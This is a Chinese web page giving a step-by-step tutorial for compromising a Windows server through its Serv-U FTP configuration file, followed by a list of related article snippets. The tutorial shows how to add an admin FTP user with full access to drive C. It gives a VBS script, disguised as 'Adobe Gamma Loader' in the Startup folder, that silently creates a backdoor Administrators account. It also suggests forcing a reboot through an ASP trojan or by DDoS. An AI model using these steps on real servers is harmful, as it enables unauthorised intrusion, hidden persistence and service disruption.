Serv-U 用户的另类盗取

注:在此之前最好在自己的机器上装一个Serv-U,

我们先看看ServUStartUpLog.txt

Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat

。。。。。。。。。。

版本挺新阿,呵呵

接着看看ServUDaemon.ini(用户配置文件)

哇考,里面的用户真多阿!

接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\

哈哈哈,到次为止大家都知道我的用意了把!

接这ftp上去

哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u)

由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了!

我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader,这样管理员不容易发现!

脚本内容:

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c net user allen ***** /add",0)

b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)

大家都能看懂把,哈哈

然后把他传到Documents and Settings\All Users\「开始」菜单\程序\启动\

呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。

接着用asp木马上传一个shutdown.exe

然后执行shutdown.exe 127.0.0.1 /r

哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。

不过在nt or 2000上普通用户都可以重起机器

还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了!

如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)

(0)

相关推荐

  • Serv-U 用户的另类盗取

    注:在此之前最好在自己的机器上装一个Serv-U, 我们先看看ServUStartUpLog.txt Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat .......... 版本挺新阿,呵呵 接着看看ServUDaemon.ini(用户配置文件) 哇考,里面的用户真多阿! 接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住

  • go web 预防跨站脚本的实现方式

    一 点睛 现在的网站包含大量的动态内容以提高用户体验,比过去要复杂得多.所谓动态内容,就是根据用户环境和需要,Web 应用程序能够输出相应的内容.动态站点会受到一种名为"跨站脚本攻击"(Cross Site Scripting, 安全专家们通常将其缩写成 XSS)的威胁,而静态站点则完全不受其影响. 攻击者通常会在有漏洞的程序中插入 JavaScript.VBScript. ActiveX 或 Flash 以欺骗用户.一旦得手,他们可以盗取用户帐户信息,修改用户设置,盗取或污染 coo

  • MySQL解决SQL注入的另类方法详解

    本文实例讲述了MySQL解决SQL注入的另类方法.分享给大家供大家参考,具体如下: 问题解读 我觉得,这个问题每年带来的成本可以高达数十亿美元了.本文就来谈谈,假定我们有如下 SQL 模板语句: select * from T where f1 = '{value1}' and f2 = {value2} 现在我们需要根据用户输入值填充该语句: value1=hello value2=5 我们得到了下面的 SQL 语句,我们再提交给数据库: select * from T where f1='h

  • 惊!QQ新漏洞 腾讯3亿用户遭受威胁 附说明

    根据易观国际发布<2007年第2季度中国即时通讯市场季度监测>报告显示,中国活跃的IM软件账号已经 达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者.可是你知道吗,你的QQ现在很危险了! 不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ.想知道他们是怎么做的以及该如何避免自己的QQ 被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞). 月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的"QQ场景漏洞".他们惊奇的发现,不需要

  • 防止adsl用户被入侵的一些技巧与设置方法

    随着各地ADSL网络的蓬勃发展,实现永久连接.随时在线已不再是遥远的梦,但是,我们必须明白,永久连入Internet同样也意味着遭受入侵的可能性大大增加.知己知彼,方能百战不殆,让我们了解一下黑客入侵ADSL用户的方法和防范手段吧.  黑客入侵ADSL用户的方法  在很多地方都是包月制的,这样的话,黑客就可以用更长的时间进行端口以及漏洞的扫描,甚至采用在线暴力破解的方法盗取密码,或者使用嗅探工具守株待兔般等待对方自动把用户名和密码送上门.  要完成一次成功的网络攻击,一般有以下几步.第一步就是要

  • PHP多用户博客系统分析[想做多用户博客的朋友,需要了解]第1/3页

    01,LxBlog 博客系统 这是phpwind推出的博客系统,值得推荐吧,国内推出php多用户博客的不多,如果你英文不好,就只能用这个系统了! PHPWind 博客系统 是一套基于php+mysql 数据库平台架构的多用户博客系统,该系统融合了Blog的最新元素,拥有强大的个人主页系统,独立的二级域名功能,灵活的用户模版系统,丰富的朋友圈和个性相册功能. 网站统筹化 1. 使用论坛整合接口,让博客论坛容为一体 在论坛里可以设置用户组权限,让特定的用户组有权限使用博客个人主页系统 用户在论坛里浏

  • Windows XP的另类垃圾排毒攻略

    提起电脑的清理工作,大家都很熟悉吧!不过,很多朋友在对清理的认识上还有一定的局限性,更多的是集中在删除一些windows自身生成的垃圾文件等方面:实际上还有一些另类的垃圾,比如:软件在右键菜单中的项目;IE右键菜单.工具栏图标.收藏夹中的无用项目;失效的快捷方式等. 它们的存在,不仅浪费了我们宝贵的硬盘空间,还会给病毒留下可乘之机.所以及时地给电脑来个大清理是很有必要的. 一.资源管理器的右键菜单 1.删除右键菜单中的多余项 大家都知道,许多软件在安装时,首先要把自身的安装文件解压缩到一个临时目

  • 批量建立文件夹,为Serv_U批量创建用户

    在网上看了下,也没有找到好的方法.没办法,只能拿出老一套了用DOC建立了. 方法步骤. 1.首先建立各个账户的文件夹. 账号如果有规律的话那好说,如:ftp001.ftp001......ftp100,直接在Excel里自动产生即可,然后将产生的账号放到一个txt文件里,一行一个账号.如果不是有规律的,那没办法,只能一个一个输入了. 2.准备好这个账号的account.txt文件后,建立一个run.bat文件,打开文件,输入一下代码 @for /f %%i in (account.txt) do

  • Asp.net mvc验证用户登录之Forms实现详解

    这里我们采用asp.net mvc 自带的AuthorizeAttribute过滤器验证用户的身份,也可以使用自定义过滤器,步骤都是一样. 第一步:创建asp.net mvc项目, 在项目的App_Start文件夹下面有一个FilterConfig.cs,在这个文件中可以注册全局的过滤器.我们在文件中添加AuthorizeAttribute过滤器如下: public class FilterConfig { public static void RegisterGlobalFilters(Glo

  • django实现登录时候输入密码错误5次锁定用户十分钟

    在学习django的时候,想要实现登录失败后,进行用户锁定,切记录锁定时间,在网上找了很多资料,但是都感觉不是那么靠谱,于是乎,我开始了我的设计,其实我一开始想要借助redis呢,但是想要先开发一个简单的,后续在拆分后,然后在去进行拆分, 这样也是很接近我们在真实的开发中所遇到问题. 我的思路是: 输入账号密码>是否已经登录>提示已经登录 输入账号密码>错误次数少于6次>校验密码>登录成功,记录登录时间,错误次数清空,记录登录状态 输入账号密码>错误大于六次>提示

随机推荐